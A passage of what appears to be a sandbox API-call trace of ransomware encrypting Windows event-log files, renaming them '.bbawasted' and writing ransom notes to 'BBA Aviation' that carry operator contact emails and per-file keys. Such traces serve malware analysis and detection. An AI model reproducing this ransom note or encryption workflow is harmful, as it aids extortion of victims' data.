dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0190.868] CloseHandle (hObject=0x294) returned 1 [0190.873] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0190.874] CloseHandle (hObject=0x280) returned 1 [0190.874] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0190.874] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6bd0) returned 1 [0190.874] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0190.875] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0190.875] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6bd0) returned 1 [0190.875] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0190.875] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0190.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0190.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0190.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0190.884] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]p2dduA0VDY6Q3OvFV4xqx+2IbJT3sb1I7rzFgajzynpO0RFIBqe08yQEiNA5FrrT\r\niQ79fdasSadbfN4/vtYosHTsN/rPq8fPvJKAP1s0lEA7P1vXVxrtCJLONk7g8lD+\r\nyXsIhvOqC0SQKu6/rgr2L3uall0DoJ+nxGnTfMgNRuSuNmaAUlKH9/murVSL3s5t\r\nuFs38Okm6tEQCEbylKwYfUV6n3jFu1EB008dhSXMaOCPJ6BeDsxjil+zR5DwIRmd\r\n78+rfM8q38YTMnHONN8tdZtlm+45fj2tTUIGdOXqp+pF9Izp5PmOnbU7x57ojjC6\r\nsUSoZQDI9IKInsaMJfR8QWLTdVzSHAZRvzdkbfgMlPsDodVmQ2cv8i4sFV6dqrht\r\nfOjFd4LxSorCnfeZAp0UMw9iJjOSbN7PK2HGf/PhRZnM0B2Z6JZ/08hterJpAEnt\r\nnrTeBsaiM3tQCfeFl3VkR/lRlENWj2ovzUnn3uQoaARoeGUFydsJ9vqMPKeXZJLw\r\nOJuW0gBHh1uNqlwVuzHmwSjqNnleVHO9rW+EvJUVsVfBu7SQqlxOyKhUW3mu4hUn\r\nxQt+ub93AtFD8ew3u4J8jkYw9ACOOcqJlMEUGdINI5mODgWpTLO25uxu72z3d6/S\r\nKN6Ktr71C57PrIIOmvQv4mJGKCU+qNzVLCLsRIU+Sxo=[end_key]\r\nKEEP IT\r\n") returned 984 [0190.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0190.884] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0190.885] SetEndOfFile (hFile=0x28c) returned 1 [0190.887] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0190.887] CloseHandle (hObject=0x28c) returned 1 [0190.892] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0190.893] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9770 | out: hHeap=0x660000) returned 1 [0190.893] _aulldvrm () returned 0x0 [0190.893] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6680) returned 1 [0190.893] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0190.893] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0190.893] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 65 [0190.893] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28c) returned 0x6aecf0 [0190.894] lstrcpyW (in: lpString1=0x6aed72, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0190.894] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0190.894] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6ce0) returned 1 [0190.894] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0190.894] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0190.894] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0190.895] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0190.896] SetEndOfFile (hFile=0x28c) returned 1 [0190.897] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.897] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0190.897] lstrcpyW (in: lpString1=0x6aed72, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0190.897] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx.bbawasted")) returned 1 [0190.898] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0190.898] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0190.898] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0190.898] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0190.898] CloseHandle (hObject=0x280) returned 1 [0191.130] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0191.131] CloseHandle (hObject=0x294) returned 1 [0191.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0191.131] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6a38) returned 1 [0191.132] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0191.132] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0191.132] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0191.133] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0191.133] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0191.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0191.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0191.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0191.144] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]L726zm2nnxUjjnRiucGiFKhxRchAfrtY4Jb2XE3KKr78Rap7zWLq0MX0uf+klPnY\r\nt3YgjPKlDqG/mHCDfM3UrUcDyLEvYKgXYc6QANpfV09YWKqF8RGugDYUGi6I2Qnc\r\nhhvNkNEcgAAUzeekONPbX932kwNzgF6y8gSDMOG87W+VdsaZxv01kdB3I+dpSJL4\r\nqBWxZlUlCkC8oz4uzonU/2sXyHXy+VQiTUiu5gvZFOGN8n9vASB0QlxXNuwyjUuA\r\n4ZL/TR14RV/7PmTG+a4FuN+h6EYfrVb9oNHZ50aapLFIrctXX/9blUFXTDNDpSdq\r\nkUjdUi9Q0BCSttaE1T1MBcgYCssf4AO9S5zYv/HXcLy4OqDLtfoluwFeNCE5E1OF\r\nzBrlY5FjS9/UmWWjT8XCQ7drEL2vWtXMfa+hK3sh9NUlVsSXO9Vmv0rw7tVrYAiW\r\n3JjKBc0jtnv2ZiX+Z2Iy6nMvdGQJAyN3UUVJmg1wbqXAidSAy/hOU1wmVGc5Yiv7\r\nlQJzRu74Y+4ALM4FggYgi5AZVM7jdSJt0yXfdzYM8fLY4c006jD/a07o8vRPZ9RI\r\nXcTYWM91NrwH1KzazuOQnSqMMV5EMywI4HtqNAlulCo7dvqxRSF25gf9pywDSaVY\r\n6tVfr2f/eglUt5JW0aNEoaJKRdAB3a4FHP1vEN8ygbI=[end_key]\r\nKEEP IT\r\n") returned 984 [0191.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0191.144] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0191.145] SetEndOfFile (hFile=0x28c) returned 1 [0191.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0191.147] CloseHandle (hObject=0x28c) returned 1 [0191.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0191.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9858 | out: hHeap=0x660000) returned 1 [0191.152] _aulldvrm () returned 0x0 [0191.152] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6570) returned 1 [0191.153] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0191.153] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0191.153] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 63 [0191.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x288) returned 0x6aecf0 [0191.154] lstrcpyW (in: lpString1=0x6aed6e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0191.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0191.154] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6350) returned 1 [0191.154] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0191.154] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0191.154] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0191.155] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0191.268] SetEndOfFile (hFile=0x28c) returned 1 [0191.273] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0191.273] lstrcpyW (in: lpString1=0x6aed6e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0191.273] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx.bbawasted")) returned 1 [0191.274] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0191.274] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0191.274] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0191.274] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0191.275] CloseHandle (hObject=0x294) returned 1 [0191.280] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0191.285] CloseHandle (hObject=0x280) returned 1 [0191.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0191.285] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a68a0) returned 1 [0191.286] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0191.286] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0191.286] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a5f98) returned 1 [0191.287] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0191.287] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0191.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0191.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0191.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0191.298] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]b9zUMgpu9BUdyf71IWfVM1PtY5y4fyeUncxHEB8fq3MRgtSXIgnxh1D3rejWqWas\r\nERe3nfrbKr70iIKOLewMWgG6cxH327iscV+voaGyqx99fDZwNslRZmuS3AreoZtT\r\nXt4925AW+Hbc8M58IWkxFOlRYDJZpUPULkle2E1B0/i5fL7XQeg4MzoRs6wgagL2\r\nHDGgobankf+33J3nEmJtLG8r2ylMAWSbnVq15CsokvehSyLEvElpjP4XrJn6dD3B\r\nPuDb0dnlR8EYDFe95BWfntC7Zz+UOlLOgracMbRJnt2vT9Tvw6eePabw/OjCDdC0\r\n3fzc2tpYFdWzco6mpwlgKIH9BXzMuwvfpli4Qajk5kuIC8ZUM7os3o6F+RnfS+Hh\r\n9yN/on/yGnaJRbupMJpYVL7SA7q0eLbAdvvu7+u+lwGKQ+0z5uWBulHpcJwYfYPK\r\nhQAD/7rBWmVz/Nla+1cqiVyvFK/O35DoSPD7rQW19OkmpKnyiylw09FhdcfybhHC\r\nNV+8z1knwPNOlLexYkf33bXtdhpAQ0yo/+AWXWWgEhZEQl4nkquc6ZHoalLKPlzR\r\nBA16CnnfSQHiiaZv5kQIHI7K/dZy/LJTsdloSwfOxk9PPkDvGuGRLvG2muz4ld/C\r\nMuHDdn45mxVMkKfFwybZqMiokNo4gpzr4b7ynv9PDaV=[end_key]\r\nKEEP IT\r\n") returned 984 [0191.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0191.298] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0191.298] SetEndOfFile (hFile=0x28c) returned 1 [0191.301] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0191.301] CloseHandle (hObject=0x28c) returned 1 [0191.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0191.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8338 | out: hHeap=0x660000) returned 1 [0191.565] _aulldvrm () returned 0x0 [0191.565] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6020) returned 1 [0191.566] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0191.566] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0191.566] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 54 [0191.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x6aecf0 [0191.566] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0191.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0191.566] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6240) returned 1 [0191.567] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0191.567] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0191.567] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0191.568] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0191.569] SetEndOfFile (hFile=0x28c) returned 1 [0191.569] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0191.570] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0191.570] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx.bbawasted")) returned 1 [0191.572] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0191.572] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0191.572] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0191.572] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0191.572] CloseHandle (hObject=0x280) returned 1 [0191.579] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0191.580] CloseHandle (hObject=0x294) returned 1 [0191.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0191.580] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6818) returned 1 [0191.581] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0191.581] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0191.581] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6350) returned 1 [0191.581] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0191.581] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0191.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0191.593] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0191.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0191.593] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 